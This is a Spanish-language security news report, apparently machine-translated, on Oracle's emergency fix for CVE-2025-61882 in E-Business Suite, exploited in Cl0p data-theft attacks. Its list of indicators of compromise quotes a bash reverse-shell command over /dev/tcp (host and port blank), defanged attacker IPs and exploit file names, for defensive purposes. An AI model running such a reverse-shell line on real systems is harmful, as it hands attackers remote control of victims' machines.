Oracle ha publicado una actualización de emergencia para corregir una falla de seguridad crítica en su suite E-Business que, según afirma, ha sido explotada en la reciente ola de ataques de robo de datos de Cl0p.
La vulnerabilidad, rastreada como CVE-2025-61882 (puntuación CVSS: 9,8), se refiere a un error no especificado que podría permitir a un atacante no autenticado con acceso a la red a través de HTTP comprometer y tomar el control del componente de procesamiento simultáneo de Oracle.
«Esta vulnerabilidad se puede explotar de forma remota sin autenticación, es decir, se puede explotar en una red sin necesidad de un nombre de usuario y contraseña», dijo Oracle dijo en un aviso. «Si se explota correctamente, esta vulnerabilidad puede provocar la ejecución remota de código».
En otra alerta, el director de seguridad de Oracle, Rob Duhart dijo la empresa ha publicado correcciones para el CVE-2025-61882 para «proporcionar actualizaciones contra posibles casos de explotación adicionales que se descubrieron durante nuestra investigación».
Como indicadores de compromiso (IOC), la tecnología compartía las siguientes direcciones IP y artefactos, lo que indica la probable participación de Cazadores de LAPSUS$ dispersos grupo también en el exploit -
- 200.107.207 [.] 26 (Posible actividad GET y POST)
- 185.181.60 [.] 11 (Posible actividad GET y POST)
- sh -c /bin/bash -i >& /dev/tcp// 0>&1 (Establecer una conexión TCP saliente a través de un puerto específico)
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py
La noticia del día cero de Oracle llega días después de los informes surgido de una nueva campaña probablemente emprendida por el grupo de ransomware Cl0p dirigida a Oracle E-Business Suite. Mandiant, propiedad de Google, describió la actividad en curso como una «campaña de correo electrónico de gran volumen» lanzada desde cientos de cuentas comprometidas.
En un correo Charles Carmakal, director de tecnología de Mandiant en Google Cloud, dijo en LinkedIn que «Cl0p explotó múltiples vulnerabilidades en Oracle EBS, lo que le permitió robar grandes cantidades de datos de varias víctimas en agosto de 2025», y añadió que «se explotaron múltiples vulnerabilidades, incluidas las que se corrigieron en la actualización de julio de 2025 de Oracle y una que se parcheó este fin de semana (CVE-2025-61882)».
«Dada la amplia explotación masiva de los días cero que ya se ha producido (y la explotación del día n que probablemente continuarán otros actores), independientemente de cuándo se aplique el parche, las organizaciones deben examinar si ya se han visto comprometidas», señaló Carmakal.
(Esta es una historia en desarrollo. Vuelva a consultar para obtener más información.)